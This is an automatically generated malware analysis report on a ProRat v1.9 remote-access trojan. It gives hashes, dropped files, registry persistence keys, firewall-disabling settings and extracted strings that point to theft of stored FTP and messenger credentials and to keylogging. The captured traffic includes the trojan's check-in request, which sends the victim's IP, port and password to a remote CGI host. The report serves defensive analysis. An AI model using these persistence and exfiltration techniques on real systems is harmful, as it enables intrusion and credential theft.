Gen.Trojan.Heur.GZ.1uZbymXu5fi_e505c9effa

by malwarelabrobot on February 9th, 2017 in Malware Descriptions.

Trojan.Win32.Agent.wi (Kaspersky), Gen:Trojan.Heur.GZ.1uZ@bymXu5fi (B) (Emsisoft), Gen:Trojan.Heur.GZ.1uZ@bymXu5fi (AdAware), Trojan.Win32.Bumat.FD, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: e505c9effa1c6fe3bb5728ebcd2abab0
SHA1: 2ed26b5d28109d5f7dc4c8e83b04505753fb611f
SHA256: 9af0ec7b29bce45948300dc33cc186149263770ae6378cb28bc292a4f8327f82
SSDeep: 24576:x563ey8gZqj4yoHQZMZjuejO8rHzKGk50RLi:j/ qEyoHQZMVi8rbG00
Size: 884166 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: LCCWin32v1x, UPolyXv05_v6
Company: Mail.Ru
Created at: 2000-06-12 06:19:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WINDOWSAPP.EXE:1024
fservice.exe:3584
%original file name%.exe:3308
FACEBOOK.EXE.EXE:2472

The Trojan injects its code into the following process(es):

DllHost.exe:3108
lncom.exe:2716
services.exe:1588

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process WINDOWSAPP.EXE:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\FACEBOOK.EXE.EXE (1742 bytes)

The process fservice.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\services.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

The Trojan deletes the following file(s):

C:\Windows\System32\fservice.exe (0 bytes)
C:\Windows\system\sservice.exe (0 bytes)

The process lncom.exe:2716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\fservice.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

The process %original file name%.exe:3308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\WINDOWSAPP.EXE (877 bytes)

The process FACEBOOK.EXE.EXE:2472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\lncom_.png (66260 bytes)
C:\Windows\System32\FACEBO~1.EXE.bat (109 bytes)
C:\Windows\System32\FACEBOOK.EXE.png (3073 bytes)
C:\Windows\System32\lncom.exe (45172 bytes)

Registry activity

The process DllHost.exe:3108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "DllHost.exe"

The process WINDOWSAPP.EXE:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process lncom.exe:2716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "C:\Windows\system32\fservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = "083/079/52/089"
"LanNotifie" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "C:\Windows\system\sservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "whbuhl"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "1"
"Hata" = "Hack"
"Port" = "4001"
"Sifre" = "032547"
"Mail" = "ls/`rihrir`hoh00jAfl`hm/bnl"
"ICQ_UIN2" = "046007686"
"FW_KILL" = "1"

"Online_List" = "iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh"
"KSil" = "1"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"

The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process FACEBOOK.EXE.EXE:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 8F 64 85 F1 BB 81 D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "FACEBOOK.EXE.EXE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
db723c3085df6a5b998ac7da76b8ae6b c:\Windows\System32\WINDOWSAPP.EXE
bd977de35c191fb25508c7c9a16e0a7a c:\Windows\System32\fservice.exe
bd977de35c191fb25508c7c9a16e0a7a c:\Windows\System32\lncom.exe
562e0d01d6571fa2251a1e9f54c6cc69 c:\Windows\System32\reginv.dll
b4c72da9fd1a0dcb0698b7da97daa0cd c:\Windows\System32\winkey.dll
bd977de35c191fb25508c7c9a16e0a7a c:\Windows\services.exe
bd977de35c191fb25508c7c9a16e0a7a c:\Windows\system\sservice.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2848 3072 4.07684 f41d010ef3048c18a8afad0bffd69494
.bss 8192 580 0 0 d41d8cd98f00b204e9800998ecf8427e
.data 12288 104 512 2.16578 9529af9f59e0ccedfdfc324f0bf83531
.idata 16384 986 1024 2.99033 db2569361ee483d3ea15134abc0d84bd
.rsrc 20480 924 1024 2.39878 9cff17511d40ceaa4f6625a37b8f32af

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 9
39f8b9fea1a0a771737baef890fcd9b4
db723c3085df6a5b998ac7da76b8ae6b
3c9c97b66c73826a32aa994b48d9cfa6
881f149fe9c25b3d5dc3924df259dea9
f759a6290c11536bea92776beff22f52
760304eac9dca1f2d391ad3dcb469b80
7c279ee03368b9f682c777549b5c5c06
45dc5bfc17fd6b93eded4209f199fea5
510d00f8a51a12019240640c36dc2718

URLs

URL IP
hxxp://www.ovip.icq.com/friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15
hxxp://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=5:32:28_AM&servertarihi=2/8/2017&serversifre=123456&islem=log 103.224.182.209
hxxp://www.yoursite.comhxxp://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=5:32:28_AM&servertarihi=2/8/2017&serversifre=123456&islem=log 103.224.182.209
hxxp://www.icq.com/friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 178.237.20.20


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY ICP Email Send via HTTP - Often Trojan Install Reports

Traffic

GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Connection: Keep-Alive
Cookie: geo=359; adsPopup0=1098232990103


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.10.2
Date: Wed, 08 Feb 2017 03:32:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=75
Location: hXXps://icq.com/friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15
X-XSS-Protection: 1; mode=block; report=hXXps://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=600; includeSubDomains; preload
a1..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx/1.10.2&l
t;/center>..</body>..</html>..0..HTTP/1.1 302 Moved Tem
porarily..Server: nginx/1.10.2..Date: Wed, 08 Feb 2017 03:32:25 GMT..C
ontent-Type: text/html..Transfer-Encoding: chunked..Connection: keep-a
live..Keep-Alive: timeout=75..Location: hXXps://icq.com/friendship/ema
il_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user
_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157
116797&friend_nickname2=&friend_contact2=&x=60&y=15..X-XSS-Protection:
 1; mode=block; report=hXXps://cspreport.mail.ru/xxssprotection..X-Con
tent-Type-Options: nosniff..X-Frame-Options: SAMEORIGIN..Strict-Transp
ort-Security: max-age=600; includeSubDomains; preload..a1..<html>
;..<head><title>302 Found</title></head>..<
body bgcolor="white">..<center><h1>302 Found</h1>
</center>..<hr><center>nginx/1.10.2</center>..
</body>..</html>..0..
<<< skipped >>>


GET hXXp://VVV.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=5:32:28_AM&servertarihi=2/8/2017&serversifre=123456&islem=log HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.yoursite.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Wed, 08 Feb 2017 03:32:28 GMT
Server: Apache
X-Powered-By: PHP/5.4.45-0 deb7u6
Set-Cookie: __tad=1486524748.6712249; expires=Sat, 06-Feb-2027 03:32:28 GMT
Location: hXXp://ww38.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=5:32:28_AM&s







The Trojan connects to the servers at the folowing location(s):







DllHost.exe_3108:




.text
`.data
.rsrc
@.reloc
KERNEL32.dll
msvcrt.dll
ole32.dll
ntdll.dll
dllhost.pdb
_wcmdln
_amsg_exit
6.1.7600.16385 (win7_rtm.090713-1255)
dllhost.exe
Windows
Operating System
6.1.7600.16385

lncom.exe_2716:




.rsrc
Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
Uh.xC
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpString@
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpClid
OnProcessHeader8
TSyncSmtpCli
smtp
SMTP component not ready
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException`_D
EFtpCtrlSocketExceptionD_D
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWordT
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeysd2E
AutoHotkeys
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowStated4E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.reloc
.aspack
.adata
>%U:f{
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
hodll.dll
mfc42.dll
msvcrt.dll
`.rdata
@.data
.HookSec
B[ ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey ]
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
0'04090?0
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ProRat@Yahoo.Com
<ProRat@Yahoo.Com>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
